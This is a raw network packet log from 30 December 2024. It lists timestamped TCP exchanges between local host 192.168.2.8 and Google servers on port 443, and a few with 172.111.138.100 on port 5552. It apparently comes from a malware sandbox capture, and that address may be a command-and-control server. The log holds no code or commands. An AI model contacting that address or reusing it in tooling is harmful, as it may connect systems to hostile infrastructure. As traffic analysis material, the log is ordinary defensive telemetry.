                                                                                                                                                                            Dec 30, 2024 11:49:15.813813925 CET44349759142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.814064026 CET49759443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.814081907 CET44349759142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.814212084 CET49759443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.814244032 CET49759443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.814296961 CET44349759142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.814380884 CET49759443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.815018892 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.815063000 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.815376043 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.815376043 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.815418005 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.820158005 CET44349757142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.820209980 CET44349757142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.820240974 CET49757443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.820272923 CET44349757142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.820336103 CET44349757142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.820368052 CET49757443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.822910070 CET49757443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.825130939 CET49757443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.825162888 CET44349757142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.825813055 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.825858116 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.826055050 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.826247931 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.826266050 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.958015919 CET44349756142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.958126068 CET49756443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.958324909 CET49756443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.958384991 CET44349756142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.958556890 CET44349756142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.958571911 CET49756443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.958615065 CET49756443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.959263086 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.959306002 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.959387064 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.959695101 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:15.959713936 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.981373072 CET44349758142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.981427908 CET44349758142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.981519938 CET49758443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.981539011 CET44349758142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.981630087 CET49758443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.984066010 CET555249753172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.984199047 CET497535552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:15.998672009 CET49758443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.998702049 CET44349758142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.999353886 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.999407053 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:15.999567032 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.999978065 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:15.999996901 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.036103964 CET497535552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:16.040977955 CET555249753172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.443053007 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.443134069 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.443748951 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.443759918 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.443919897 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.443924904 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.453767061 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.453843117 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.454624891 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.454682112 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.459484100 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.459507942 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.459897995 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.459954023 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.460441113 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.503334045 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.570010900 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.570087910 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.570782900 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.570823908 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.577972889 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.577996969 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.578258991 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.578310966 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.579138041 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.619328976 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.636678934 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.636749029 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.667063951 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.667083979 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.667535067 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.667541027 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.832962036 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.833024025 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.833967924 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.834013939 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.834022999 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.834058046 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.849428892 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.849466085 CET44349761142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.849478960 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.849518061 CET49761443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.850111961 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.850143909 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.850208044 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.850414991 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.850425959 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.864164114 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.864219904 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.864243031 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.864259958 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.864296913 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.864317894 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.864340067 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.864411116 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.865190029 CET49762443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.865205050 CET44349762142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.865756989 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.865828037 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.865895987 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.866220951 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:16.866234064 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.941963911 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.942028999 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.942049980 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.942091942 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.942238092 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.942306995 CET44349763142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.942368984 CET49763443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.943140030 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.943186045 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:16.943245888 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.943635941 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:16.943650961 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.063882113 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.063932896 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.063944101 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.063976049 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.063987970 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.064018965 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.064026117 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.064044952 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.064064026 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.064086914 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.071247101 CET49764443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.071265936 CET44349764142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.075602055 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.075658083 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.075719118 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.076167107 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.076184034 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.449558020 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.449832916 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.450350046 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.450401068 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.452168941 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.452174902 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.452430964 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.452501059 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.454524994 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.467238903 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.467356920 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.467849970 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.467866898 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.470077991 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.470088005 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.495335102 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.550766945 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.551075935 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.551635027 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.551841974 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.553366899 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.553376913 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.553636074 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.556281090 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.556281090 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.603326082 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.675597906 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.676035881 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.680825949 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.680825949 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.680836916 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.680850029 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.820152044 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.820775032 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.820799112 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.820811033 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.820954084 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.821125984 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.821137905 CET44349765142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.821168900 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.821187019 CET49765443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.824057102 CET49770443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.824090958 CET44349770142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.824174881 CET49770443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.829389095 CET49770443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.829405069 CET44349770142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.877580881 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.877629042 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.877720118 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.877732992 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.877732992 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.877846003 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.878968954 CET49766443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.878988981 CET44349766142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.880058050 CET49771443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.880108118 CET44349771142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.880418062 CET49771443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.881370068 CET49771443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:17.881381989 CET44349771142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.922105074 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.922509909 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.922544003 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.922666073 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.922666073 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.922704935 CET44349767142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.922821999 CET49767443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.923585892 CET49772443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.923623085 CET44349772142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:17.924200058 CET49772443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.924200058 CET49772443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:17.924232006 CET44349772142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.091334105 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.091389894 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.091607094 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:18.091639042 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.091716051 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:18.101608038 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.101675034 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.105374098 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:18.456810951 CET44349770142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.456913948 CET49770443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.457571983 CET44349770142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.457638025 CET49770443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.471600056 CET49770443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.471709013 CET49771443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:18.471723080 CET49772443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.473809004 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.473850012 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.473961115 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.474112034 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:18.474155903 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.474210978 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:18.475559950 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.475570917 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.476114035 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:18.476133108 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.476669073 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.476682901 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.476764917 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.485452890 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:18.485471010 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:18.498985052 CET49768443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:18.499013901 CET44349768142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.080149889 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.080218077 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.084942102 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.085026979 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.085818052 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.085916042 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.093502045 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.093605042 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.094252110 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.094394922 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.126420975 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.126446962 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.126837015 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.126898050 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.128155947 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.133476973 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.133511066 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.133876085 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.133929014 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.134469986 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.135188103 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.135202885 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.136109114 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.136188984 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.137664080 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.171327114 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.175331116 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.179342031 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.459162951 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.459228039 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.459249020 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.459291935 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.459825039 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.459845066 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.460517883 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.460586071 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.460838079 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.460853100 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.460884094 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.460933924 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.461292028 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.461309910 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.461796999 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.461821079 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.470787048 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.470875978 CET49775443192.168.2.8142.250.185.78
